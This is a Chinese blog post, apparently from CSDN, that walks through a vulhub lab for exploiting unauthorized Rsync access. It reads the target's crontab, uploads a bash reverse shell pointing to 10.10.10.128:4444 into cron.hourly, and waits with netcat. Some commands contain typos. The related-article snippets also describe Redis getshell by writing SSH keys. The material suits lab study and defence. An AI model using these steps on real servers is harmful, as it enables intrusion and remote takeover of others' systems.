Rsync反弹shell

最新推荐文章于 2021-04-24 11:50:37 发布
最新推荐文章于 2021-04-24 11:50:37 发布
阅读量239 收藏
点赞数
分类专栏: 安全 中间件 漏洞 文章标签: Rsync vulhub搭建 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tryhard_go/article/details/84172035
版权
安全 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
中间件
3 篇文章 0 订阅
订阅专栏
漏洞
3 篇文章 0 订阅
订阅专栏

Rsync反弹shell
环境下载:https://vulhub.org/#/docs/,解释很清楚,先将环境搭建起来
将文件下载到dkcer下
1、开启docker

进入:vulhub-master/rsunc/common 
开启:sudo docker-compose up

2、端口扫描

3、使用rsync协议连接目标主机

rsync rsync://10.10.10.131/src/

4、查看crontab配置文件

reync rsunc://10.10.10.131/src/etc/crontab

5、下载crontab配置文件,查看配置,每小时的17分执行命令/etc/crontab,每个人都不一样,自行查看,我是17

 reync rsunc://10.10.10.131/src/etc/crontab ~/crontab.txt

6、创建shell文件,ip一定要是攻击的哦,4444是为了与其他端口冲突,可以随意

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1

7、授权

chmod 777 shell

8、上传,根据自己虚拟的ip

rsync -av shell  rsync://10.10.10.131/src/ect/cron.hourly

9、监听,静静等待17分的到来

nc -nvv -lp 4444
tryhard_go
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Rsync未授权访问 getshell——漏洞复现
W小哥
11-09 3697
一、 Rsync未授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
linux shell语法综合实践2rsync start stop restart命令
qq_34412985的博客
04-21 254
#/bin/sh#author wj##rsync   Start/Stop Rsync service##chkconfig:35 13 91#description:this is Rsync service management shell script#processname:rsyncd#Source function library. /etc/rc.d/init.d/function...
rsync未授权访问漏洞
Kevin's Blog
08-06 3190
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议 一、漏洞介绍 二、漏洞环境 三、漏洞利用 3.1 漏洞探测 》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口 》》列出目标服务器目录:(两个方法皆可) 》》查看目录中的文件,如能查看说明存在未授权访问漏洞 或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用(下载任意文件
redis未授权访问反弹shell
18年3月萌新白帽子
06-26 4556
一、redis的安装1.使用wget命令获取redis的安装包wget http://download.redis.io/releases/redis-4.0.8.tar.gz2.tar –zxvf redis-4.0.8.tar.gz解压改文件然后进入redis-4.0.8这个文件夹   cd redis-4.0.8然后执行make命令由于我们刚刚安装好redis数据库,还未创建用户,默认使用的...
shell脚本实现通过Rsync批量同步Windows共享的文件夹
10-01
shell脚本实现通过Rsync批量同步Windows共享的文件夹 用到了循环和数组,通过mount.cifs挂载windows共享(老服务器SMB1.0也适用) 参考我自己写的文章: ...
Shell脚本实现监控rsync数据是否传输完
09-15
以下是一个简单的 `Shell` 脚本示例,用于监控 `rsync` 数据传输是否完成。 首先,我们需要理解脚本的基本逻辑。脚本的主要目标是检查两个条件:一是确认目标文件夹的大小是否与源文件夹一致,二是检查 `rsync` ...
rsync rpm安装包
最新发布
09-07
rsync rpm安装包
hactar:使用 rsync 的增量每日备份脚本
06-12
使用 rsync 的增量每日备份脚本 版权所有 (c)2015 版本 1.01 这个脚本绝对没有保证。 这是免费软件,欢迎您在某些条件下重新分发它。 有关详细信息,请参阅 CC BY-NC-SA 4.0。 用法: hactar [OPTIONS] SOURCE ...
Rsync漏洞 && Redis漏洞
CN_SHzhaoyujie的博客
12-04 1341
Rsync漏洞 && Redis漏洞 Rsync配置不当 Rsync(remote synchronize)是一款实现远程同步功能的软件。它在同步文件时可以保持原来文件的权限,时间,软硬链接等附加信息。rsync默认同步是不加密,可使用ssh隧道方式进行加密同步。端口默认873,和其他软件搭配使用 rsync + crontab rsync + sersync 使用ssh隧道方式进...
未授权访问漏洞
niqiu320的博客
04-24 4525
web端未授权访问 未授权访问:未授权访问漏洞可以理解为需要安全配置或权限认证的地址,授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构中 一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构中 一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击者利用。 web端未授权挖掘实例 查找技巧 1、在访问后台时会在一瞬间加载出后台界面, 这时可以尝试挖掘。 2、在后台地址url中后面输入
redis 未授权/知道密码 下getshell
问题很多的小明
06-20 471
常用的方法,计划任务,写webshell,主从复制,写公钥文件(会覆盖) 1 写公钥文件 ssh-keygen –t rsa (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit redis-cli -h 192.168.0.109 -a 123456 config set dir /root/
rsync/redis 漏洞
bozhubing0375的博客
07-24 416
Rsync(remote synchronize)是一款实现远程同步功能的软件,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。rsync 默认同步时是不加密的,可使用 ssh隧道 的方式来进行加密同步rsync -avzP -e 'ssh -p 22 /tmp/ test@ip:/web/' rsync + crontab rsync + sersync # 实时...
Rsync未授权访问
浅笑996的博客
11-19 5199
1.漏洞名称 Rsync 未授权访问漏洞 2.漏洞原理 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。 3.漏洞利用 vulhub环境靶机 : 192.168.91.130 攻击机:kali 192.168.91.128...
文件解析漏洞
tryhard_go的博客
11-16 161
apache文件解析漏洞 漏洞环境 docker apache 漏洞成因 配置不当 实验步骤 (1)开启docker镜像 查看镜像:docker images 端口映射:docker it -d -p apache2:v2 90:80 /bin/bash 进入镜像:docker exec -it 进程号 /bin/bash 开启服务:service apache2 /bin/bash (2)进入...
rsync的几则tips(渗透技巧)
Coisini的博客
06-21 1174
关于rsync rsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。 rsync默认配置文件为/etc/rsyncd.c...
centors7无法ping百度解决办法
tryhard_go的博客
02-12 542
centors7无法ping百度 刚入门菜鸟经常遇到虚拟机无法ping百度,每次总是查查查,这次自己理理思路,加强自身记忆,希望也能对其他学习的同学有所帮助。 一查看网关是否设置正确 设置网关 vim /etc/sysconfig/network 如下: NETWORKING=yes HOSTNAME=localhost.localdomain GATEWAY=192.168.43.1 查看解析地...
Rsync未授权访问漏洞的利用和防御
weixin_30905133的博客
09-14 797
首先Rsync未授权访问利用 该漏洞最大的隐患在于写权限的开启,一旦开启了写权限,用户就可以,用户就可以利用该权限写马或者写一句话,从而拿到shell。 我们具体来看配置文件的网相关选项(/etc/rsync.conf) 这一项read only表示只读,如果这一项为no,我们就具有写权限了。 如果这边有个PHP的站,如果写个一句话,后果大家都懂得。 当然,有些时候也可以读取到一些...
shell脚本自动安装rsync
08-24
你可以使用以下 shell 脚本来自动安装 rsync: ```bash #!/bin/bash # 检查是否已安装 rsync if ! command -v rsync &> /dev/null; then echo "rsync 未安装,开始安装..." # 更新软件包列表 sudo apt update # 安装 rsync sudo apt install rsync -y echo "rsync 安装完成!" else echo "rsync 已经安装!" fi ``` 将上述脚本保存为一个.sh 文件(例如 install_rsync.sh),然后通过命令 `bash install_rsync.sh` 运行脚本。脚本会检查是否已经安装了 rsync,如果未安装,则会自动安装 rsync,并输出相应的提示信息。 注意:该脚本假设你正在使用 Ubuntu 或基于 Debian 的发行版。如果你使用的是其他 Linux 发行版,请根据相应的包管理器进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值